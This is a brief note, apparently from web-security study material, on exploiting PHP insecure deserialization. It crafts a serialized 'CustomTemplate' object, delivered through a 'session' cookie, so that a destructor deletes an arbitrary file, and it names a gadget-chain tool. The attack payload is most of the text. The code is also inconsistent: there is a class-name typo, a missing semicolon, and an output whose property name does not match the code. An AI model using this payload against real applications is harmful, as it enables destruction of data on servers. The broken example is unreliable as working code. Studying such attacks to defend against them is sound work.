Manual serialization with class internal members override (access to an app source code) in order to achieve specific functionality.
<?php
// app class definition deletes a template file in the class destructor()
// initiate the object through cookie "session"
class CustomTemplate {
// make sure the access attribute is "public"
public $template_file_path;
}
$c = new CustomTeplate();
$c->template_file_path="/path/file-to-delete.txt"
// final serialized PHP object
echo serialize($c);
/* output
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>
PHPGCC
automatic gadget chain when no source code review is possible